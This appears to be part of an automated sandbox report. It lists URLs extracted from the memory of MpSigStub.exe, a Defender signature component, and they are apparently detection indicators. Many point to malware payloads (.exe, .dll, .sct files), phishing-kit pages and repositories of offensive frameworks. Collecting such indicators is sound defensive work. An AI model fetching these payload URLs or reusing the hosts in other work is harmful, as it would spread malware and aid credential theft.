Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://piedmontrescue.org/sport/rockstar.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://pigeonious.com/
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: https://pigeonious.com/img/
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://pinkconnext.com/ds/26.gif
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: https://piscineconstruct.ro/kjy/index.php
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: https://pjoao1578pro2.site/crypt/vbscript.txt
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: https://playmesadelsol.com/wp-content/off/rt35.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://plectrum.sebdelaweb.com/mnmn/index.php
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://poOsKYsdcast.oigaprofe.com.mx/wp-includes/sodiumOsKYs_comOsKYspat/src/Core32/ChaCha20/KlrIU4
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://podcast.oigaprofe.com.mx/wp-includes/sodium_compat/src/Core32/ChaCha20/KlrIU42g.php
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://pomf.pw/files/
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: https://ppam.sslblindado.com/pande.html
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://ppds.anestesi.ulm.ac.id/wp-includes/text/diff/engine/vai/reportdhlnew2.php
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://preoccupationology.com/thisshit
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://pressionism.xyz/bbc.exe
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://pro-fit.pk/exploit.exe
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://producingemotions.es/settlementstatements242019/cgi-bin/office/index.html
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://produsedecalitate.ro/request.php
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://profdocame.co.vu/1/wp-config/storage/web.app.delve/access/draw9901/8269380-attachment-micros
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://property.appskeeper.com/wp-content/plugins/lite-cache/3Rx12s64qbadA.php
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: https://provodi.com/snn/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://prt.phosagro.ru/oa_html/rf.jsp?function_id=16181&resp_id=-1&resp_appl_id=-1&security_group_i
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: https://ps.ks-voicemail.online/?e=richana.nelson
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: https://ps.outlook.com/powershell-liveid
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://ptpb.pw/jj9a
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://pxlme.me/cytyoc4h
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: https://pypi.python.org/packages/source/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://queentour.co.id/z/s.dot
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: https://quickbooks.aeymotors.com/soft.dll
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://r0lls-r0yce.com/eft/remit.dotm?raw=true
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://rachelzy.com/yyyy/myoriginlogger.exe
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: https://radh.ga/konzo/change.php
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: https://raifeisen.co/invoice/id/305674567
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: https://ramashardware.co.za/
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://ramblerimport.com/hz4uhlut5au/yu.html
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: https://rapid.cerner.com:8243/clientapi/v1.0/clients/mnemonic/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/aybiota/mpbh33775/gh-pages/g9wl5dp.ttf
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/elevenpaths/ibombshell/
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/empireproject/
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/sharkush/test1/master/calcush.sct
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/wmitoapi/test/master/compiler.zip
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: https://rawcdn.githack.net/up.php?key=5
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://rb.gy/kc5b5e
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: https://rb.gy/kc5b5e?#ncota
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://rcimshop.com/wp-config-server.php
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp String found in binary or memory: https://realmjoin-backend-staging.azurewebsites.net/api/system/check
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://reformationtheology.com/css/reportexcelnew.php
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://register.hiramhousecamp.org/miouadthen/po1820.zip
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: https://relaja.me/qw5hlk1vcmvqb25azglzywdydxbvlmvz
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://remote.bittorrent.com
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: https://remoteally.com/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://reneerouleau.us/az/az.doc
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://rewardamericanexpress.blob.core.windows.net/aexp/online.americanexpress.com0smyca
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://rezultmedia.com/css/reportdhlnew.php
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: https://rezultmedia.com/vendor/laravel/tinker/src/reportexcelnew.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://rollingrockcolumbia.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: https://rootca.allianz.com/aapplet
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://rotf.lol/3u6d9443
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://rw.mousewinning.club/?
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080008.xml
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080009.xml
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/900/10010045.xml
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/appPrefId/affPrefId.xml
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: https://s1.ax1x.com/2020/04/28/J4Zp9S.png
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://s15events.azure-automation.net/webhooks?token=
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: https://s18.picofile.com/d/8435906618/a27ddc7a-8599-479b-9e19-f2fd4b1988c3/setup.exe
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: https://s3-ap-northeast-1.amazonaws.com/update-secure/asmsgrbarb.zip
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://s3-eu-west-1.amazonaws.com/adkooo/
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://s3.amazonaws.com/exec459/exec.tgz
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://s3.us-east-2.amazonaws.com/cotazion.pago/recibo.html
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://sad-goldwasser.62-108-34-75.plesk.page/doc00289?
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://scabraldealdun.com/hghgh/aridonorigin.exe
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: https://scalet.publicvm.com/large2/next.php
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: https://scaricapag.win/eco
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://screw-malwrhunterteams.com/scanme.txt
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://sddfdfdf.typeform.com/to/vrfwamwx
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://secure.hotbar.com/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: https://secure.logmeinrescue.com/
Source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp String found in binary or memory: https://secure.tibia.com/account/?subtopic=accountmanagement
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://securezalink.com/home.jpg/security.ocx
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: https://semalt.com/popups/popup_wow.php?lang=en
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://serv.fkn-srv.xyz/?e=tom.hughes
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://server.voiplogger0365.xyz/?e=csizemore
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://seyedishop.ir/rh1/pmt.php
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: https://shaastraarth.in/bbbg/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://shatha.n-idea.us/moo/
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: https://shop.asopalav.com/ds/0302.gif
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: https://shoplady.xyz/glsdil.php
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://shoptimes.ro/admin/clienti/opo.php
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://shreyainfosoft.com/krishnasteelcorporation/next.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://shreyainfosoft.com/shayonajwellers/after.php
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://signin.ebay
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://simetrika.com/redirect/zg9uywxklmvhdmvzqgfjy2vsbgvudc5jb20=
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://sinavtakvim.icu/zx/ag.doc
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://sis.ieadar.com.br-$r)r/Igreja-master/agendaSec/css/Sq4D0WfbvSitsO.php
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://skripon.com/oozoo/document.php
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: https://smartcheckautos%.com/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://smpn1kunjangkediri.sch.id/wp-content/uploads/upgrabe/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://soft-gps.com/wp-content/plugins/cvuohucwkp/tre/swt.php
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://sotheraho.com/wp-content/fonts/reportexcelnew.php
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: https://southpolefaxnet.ml/number/brand.php
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://southvomes.sozouths.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: https://specs2go.shawalzahid.com/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://ssl-proxy.my-addr.org/myaddrproxy.php/http://
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/Juliana.jpg
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/grdmody.jpg
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/msnGRD.jpg
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: https://ssmdevelopers.in/4raxigaptfpm/yu.html
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://staging2.lifebiotic.com/novacms/grassandrocks.php
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://staralevator.com/anygas/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://staralevator.com/anygas/nxt.php
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://static.wixstatic.com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://static.wixstatic.com/ugd/859f79_35181f339d694f87870220aa3da46c30.doc
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: https://statsdev.com/header.jpg
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: https://statseast.com/login.jpg
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://statsmag.com/apple/log.php
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://statsper.com/footer.jpg
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: https://statssale.com/header.jpg
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://stepup.pt/sugar6/ww/s.dot
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://stitch-statichosting-prod.s3.amazonaws.com/5ffbf74f106b1ff88367ac90/5ffbf62cd17b985f24b01f73
Source: MpSigStub.exe, 00000023.00000003.18286537046.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/gr-bhuj-i7uyrterwr-g6.appspot.com/vbeuryfu.com.us/bv-ury-ey-b
Source: MpSigStub.exe, 00000023.00000003.18301864575.0000015B1AEA0000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/msofficeupdater/MSUpdater.exe
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://storyofusstudios.com/n75oh9tzoyhz/lipa.html
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://stretchbuilder.com/chalkzone/next.php
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: https://stretchwrestle.com/ringcentral/wealth.php
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://studio.joellemagazine.com/drms/ind.html
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: https://subahj.linkpc.net/sarah2/next.php
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://submit-form.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://subwaybookreview.com/vl1/sample.doc
Source: MpSigStub.exe, 00000023.00000003.18300585182.0000015B1A681000.00000004.00000001.sdmp String found in binary or memory: https://suggestor.pirrit.com/engine/getpopups.php
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://sumnermail.org/sumnerscools/school.php
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: https://sundersls.weebly.com
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://sunilmaharjan.com.np/cve/cv.exe
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: https://supplementsizeup.co.uk/aa/ger/login.php
Source: RegAsm.exe, 00000008.00000002.21910178869.000000001E986000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21904446163.000000001E4C2000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: https://surustore.com/imageY9a
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://sviescfze.com/iaret52086yla/next.php
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://sviescfze.com/ns735tey89dgwmo/next.php
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://sweetsizing.com/vip/
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://syr.us/gpn
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://t.co/ou2k0nuvi8)
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://t.me/File
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp String found in binary or memory: https://t.me/IamLev1
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp String found in binary or memory: https://t.me/IamLev1x
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://tales.pt/webmail-purchase/reportexcel.php
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: https://tapro-trgovina.com/slimneweurope/next.php
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: https://tapro-trgovina.com/yalladg/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: https://techportal.cerner.com/api/validateProjectNumber?projectNumber=
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://tecnicopconline.com/wp-admin/jekbvhub.php
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: https://tegavu.com
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://telegra.ph/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://ternerdrivew.at/3/wwf.dll
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://ternerdrivew.at/3/wwf.exe
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://testweb.public360saas.se:443/biz/v2-pbr/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://themexoneonline.me/ctkjghgvjtfchgdgdmcmgcxgfxfxfxngcthgcnhtgctgcgcm/hzvzdfbjzbfjbfbb43534wbt
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://themexoneonline.me/timack/rt456475888y8y98yhvhh657467hvkffyufkhmvvhvchcvvmvce7ti7t4irgsejgxr
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://thephotographersworkflow.com/vv/popi.exe
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://thersshy.dynssl.com//
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://thersshy.dynssl.com//post.php
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://thewatch-tv.com/guyofficeaprof/post.php
Source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp String found in binary or memory: https://thiscannotpossiblywork.local/
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: https://tiagogalindo.com.br/1/ksu/index.html
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://ticket.webstudiotechnology.com/sc/wp-includes/SimplePie/XML/Declaration/ytUsz4l0Qo.php
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: https://timbeck.net/redirect/ywxpbmeuc2vyymfulwjhcmj1qgrpbnvszwdhbc5ybw==
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/bptvnhw6
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/j7tx7h8)
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/up77pck
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/y7rku84vscrobj.dll
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/yaozbad7
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/yarknmzj
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/ybsvlbvqscrobj.dll
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: https://tiw0dspxozds.azurewebsites.net/fdoi
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://todayutos.info
